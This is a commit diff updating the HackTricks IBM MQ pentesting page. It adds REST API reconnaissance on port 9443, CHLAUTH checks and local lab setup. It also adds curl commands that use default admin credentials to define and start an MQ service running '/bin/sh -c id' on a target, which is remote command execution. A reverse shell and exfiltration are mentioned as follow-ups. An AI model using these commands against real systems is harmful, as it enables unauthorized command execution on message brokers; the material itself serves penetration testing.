Merge pull request #2048 from HackTricks-wiki/research_update_src_network-services-pentesting_1414-pentesting-ibmmq_20260323_024653

carlospolop · web-flow · commit 50f260ad0925 · 2026-03-23T03:53:12.000+01:00
Research Update Enhanced src/network-services-pentesting/141...
diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md
@@ -68,6 +68,8 @@ After, it can be used with `punch-q` command.
 
 You can try to enumerate the **queue manager name, the users, the channels and the queues** with **punch-q** or **pymqi**.
 
+If TCP/1414 is filtered or the target only exposes the embedded web server, check **TCP/9443** too. Recent IBM MQ versions expose the **IBM MQ Console / REST API** there by default when `mqweb` is enabled, and the administrative REST endpoint can execute arbitrary **MQSC** commands if you have valid credentials.
+
 ### Queue Manager
 
 Sometimes, there is no protection against getting the Queue Manager name:
@@ -155,6 +157,29 @@ Showing channels with prefix: "*"...
 | SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
 ```
 
+### CHLAUTH / OAM recon
+
+A lot of "it connects but returns `2035`" cases are caused by **CHLAUTH** rules or by missing **OAM** permissions on the target objects.
+
+If you already have administrative MQSC access, `MATCH(RUNCHECK)` is the fastest way to understand which rule will be applied to a remote connection:
+
+```bash
+echo "DISPLAY CHLAUTH(DEV.ADMIN.SVRCONN) MATCH(RUNCHECK) CLNTUSER('admin') ADDRESS('10.10.10.10')" \
+  | runmqsc MYQUEUEMGR
+```
+
+Through the REST admin endpoint on `9443`, the same check can be done remotely:
+
+```bash
+curl -sku 'admin:passw0rd' \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data "DISPLAY CHLAUTH(DEV.ADMIN.SVRCONN) MATCH(RUNCHECK) CLNTUSER('admin') ADDRESS('10.10.10.10')" \
+  https://TARGET:9443/ibmmq/rest/v3/admin/action/qmgr/MYQUEUEMGR/mqsc
+```
+
+If you have enough rights to use PCF remotely, IBM exposes `MQCMD_INQUIRE_CHLAUTH_RECS`, which returns the channel authentication records and their mappings to `MCAUSER`. That is useful to confirm whether a channel maps remote users to a more privileged local account before trying message access, object creation, or service abuse.
+
 ### Queues
 
 There is a code snippet with **pymqi** (`dis_queues.py`) but **punch-q** permits to retrieve more pieces of info about the queues:
@@ -213,6 +238,8 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d
 >
 > _Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here._
 
+If **MQ Console / REST API** credentials are available, you can often reach the same administrative primitives over HTTPS on **9443** without using the MQ client libraries. IBM documents `/ibmmq/rest/v3/admin/action/qmgr/{qmgrName}/mqsc` as an endpoint that accepts **plain-text MQSC** or **JSON** commands.
+
 The service creation / deletion with PCF for remote program execution can be done by **punch-q**:
 
 **Example 1**
@@ -246,6 +273,34 @@ Done
 
 **Be aware that the program launch is asynchronous. So you need a second item to leverage the exploit** **_(listener for reverse shell, file creation on different service, data exfiltration through network ...)_**
 
+The same technique can be driven from the REST API:
+
+```bash
+curl -sku 'admin:passw0rd' \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data "DEFINE SERVICE(HACKTRICKS) CONTROL(MANUAL) SERVTYPE(COMMAND) STARTCMD('/bin/sh') STARTARG('-c id >/tmp/mq.id')" \
+  https://TARGET:9443/ibmmq/rest/v3/admin/action/qmgr/MYQUEUEMGR/mqsc
+
+curl -sku 'admin:passw0rd' \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data "START SERVICE(HACKTRICKS)" \
+  https://TARGET:9443/ibmmq/rest/v3/admin/action/qmgr/MYQUEUEMGR/mqsc
+
+curl -sku 'admin:passw0rd' \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data "DELETE SERVICE(HACKTRICKS)" \
+  https://TARGET:9443/ibmmq/rest/v3/admin/action/qmgr/MYQUEUEMGR/mqsc
+```
+
+This is especially useful during assessments where:
+
+- `9443` is reachable but `1414` is restricted to a smaller source range
+- The target team manages IBM MQ mainly through the web console and has forgotten to harden the REST roles
+- You want to avoid installing IBM MQ client libraries locally and only need MQSC-level administration
+
 **Example 2**
 
 For easy reverse shell, **punch-q** proposes also two reverse shell payloads :
@@ -338,19 +393,41 @@ If you want to test the IBM MQ behavior and exploits, you can set up a local env
 2. Create a containerized IBM MQ with:
 
 ```bash
-sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
-sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
+sudo docker pull icr.io/ibm-messaging/mq:latest
+sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:latest
 ```
 
-By default, the authentication is enabled, the username is `admin` and the password is `passw0rd` (Environment variable `MQ_ADMIN_PASSWORD`).
 Here, the queue manager name has been set to `MYQUEUEMGR` (variable `MQ_QMGR_NAME`).
 
+Recent **9.4.x** developer images changed the out-of-the-box behavior:
+
+- `admin` and `app` are only created if you set their passwords
+- IBM documents `MQ_ADMIN_PASSWORD` / `MQ_APP_PASSWORD` as **deprecated** from `9.4.0.0`
+- The preferred way is to inject secrets named `mqAdminPassword` and `mqAppPassword`
+
+For a quick local lab with Podman, you can create both users like this:
+
+```bash
+printf 'passw0rd' | podman secret create mqAdminPassword -
+printf 'passw0rd' | podman secret create mqAppPassword -
+podman run --secret mqAdminPassword --secret mqAppPassword \
+  -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR \
+  -p1414:1414 -p9157:9157 -p9443:9443 \
+  --name testing-ibmmq icr.io/ibm-messaging/mq:latest
+```
+
+With the default developer configuration:
+
+- `DEV.ADMIN.SVRCONN` only allows the `admin` user
+- `DEV.APP.SVRCONN` is the application channel and the `app` user is the expected identity
+- `https://<target>:9443/ibmmq/console` exposes the web console when the embedded web server is enabled
+
 You should have the IBM MQ up and running with its ports exposed:
 
 ```bash
 ❯ sudo docker ps
 CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
-58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq
+58ead165e2fd   icr.io/ibm-messaging/mq:latest       "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq
 ```
 
 > The old version of IBM MQ docker images are at: https://hub.docker.com/r/ibmcom/mq/.
@@ -360,6 +437,8 @@ CONTAINER ID   IMAGE                                COMMAND                  CRE
 - [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
 - [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
 - [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)
+- [IBM MQ REST API: `/admin/action/qmgr/{qmgrName}/mqsc`](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=resources-adminactionqmgrqmgrnamemqsc)
+- [IBM MQ container default developer configuration](https://github.com/ibm-messaging/mq-container/blob/master/docs/developer-config.md)
 
 
 
